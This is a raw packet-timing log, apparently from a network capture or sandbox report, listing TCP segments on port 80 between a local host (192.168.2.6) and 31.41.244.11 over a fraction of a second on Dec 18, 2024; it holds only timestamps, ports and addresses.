                                                                                                                                                              Dec 18, 2024 11:47:47.541337967 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.541378975 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.541393995 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.541425943 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.542555094 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.542603016 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.542620897 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.542660952 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.543747902 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.543766975 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.543787956 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.543806076 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.544899940 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.544945002 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.545011997 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.545049906 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.546137094 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.546149969 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.546175957 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.546205044 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.547360897 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.547374010 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.547419071 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.548387051 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.548424959 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.548425913 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.548463106 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.549621105 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.549632072 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.549679041 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.550733089 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.550745964 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.550775051 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.552011967 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.552043915 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.552052021 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.552078009 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.553069115 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.553108931 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.553256989 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.553318977 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.554383993 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.554398060 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.554431915 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.555529118 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.555541039 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.555579901 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.555598021 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.556534052 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.556582928 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.556652069 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.556684017 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.557811022 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.557832003 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.557859898 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.557874918 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.558912992 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.558958054 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.559000015 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.559041977 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.560120106 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.560132027 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.560175896 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.560175896 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.561395884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.561436892 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.561496019 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.561538935 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.562787056 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.562838078 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.562870026 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.562907934 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.563939095 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.563986063 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.564050913 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.564090967 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.565057039 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.565119982 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.565177917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.565216064 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.566148996 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.566220999 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.566315889 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.566315889 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.567202091 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.567214966 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.567241907 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.567255974 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.568444014 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.568487883 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.568536043 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.568567991 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.569789886 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.569832087 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.569901943 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.569941998 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.571033001 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.571074963 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.571152925 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.571192026 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.572216988 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.572230101 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.572318077 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.573257923 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.573301077 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.573326111 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.573362112 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.574275970 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.574320078 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.574345112 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.574385881 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.575270891 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.575304031 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.575350046 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.575426102 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.576508999 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.576554060 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.576642036 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.576687098 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.577585936 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.577620029 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.577629089 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.577655077 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.578802109 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.578844070 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.578911066 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.578944921 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.579911947 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.579946995 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.579971075 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.580003023 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.581109047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.581160069 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.581201077 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.581238031 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.711755037 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.711811066 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.711817026 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.711853981 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.712316990 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.712361097 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.712398052 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.712431908 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.713424921 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.713464975 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.713536978 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.713577032 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.714553118 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.714593887 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.714983940 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.715024948 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.715049982 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.715089083 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.716470003 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.716484070 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.716514111 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.717645884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.717658997 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.717690945 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.719012976 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.719054937 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.719125986 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.719166040 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.720083952 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.720104933 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.720124006 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.720136881 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.721020937 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.721034050 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.721065044 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.722068071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.722109079 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.722158909 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.722198963 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.723365068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.723407030 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.723418951 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.723452091 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.724617958 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.724658012 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.724689007 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.724724054 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.725892067 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.725903988 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.725936890 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.726860046 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.726896048 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.726969957 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.727005005 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.727919102 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.727974892 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.728105068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.728144884 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.729496002 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.729516983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.729537964 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.729553938 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.730298042 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.730336905 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.730359077 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.730395079 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.731635094 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.731677055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.731750965 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.731789112 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.733170033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.733190060 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.733231068 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.733246088 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.734292984 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.734340906 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.734519958 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.734558105 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.735457897 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.735477924 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.735496998 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.735513926 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.736684084 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.736696005 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.736725092 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.736737013 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.738056898 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.738069057 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.738116980 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.739075899 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.739089012 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.739120960 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.740144014 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.740156889 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.740190029 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.741374969 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.741391897 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.741420031 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.742269039 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.742285967 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.742315054 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.742347956 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.743213892 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.743271112 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.743339062 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.743381023 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.744659901 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.744678020 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.744730949 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.745512009 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.745523930 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.745565891 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.745599031 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.746522903 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.746570110 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.746599913 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.746634007 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.747981071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.748001099 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.748032093 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.748044014 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.749089956 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.749140024 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.749152899 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.749174118 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.750144958 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.750195026 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.750207901 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.750247955 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.751219988 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.751257896 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.751274109 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.751307964 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.752470970 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.752520084 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.752526999 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.752558947 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.753627062 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.753674030 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.753732920 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.753777027 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.754771948 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.754785061 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.754823923 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.754844904 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.755892992 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.755942106 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.755954027 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.755984068 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.757082939 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.757100105 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.757138968 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.757155895 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.758187056 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.758233070 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.758333921 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.758372068 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.759850025 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.759862900 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.759887934 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.759903908 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.760926008 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.760937929 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.760972023 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.761786938 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.761826038 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.761877060 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.761913061 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.762947083 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.762959003 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.762995005 CET4987880192.168.2.631.41.244.11
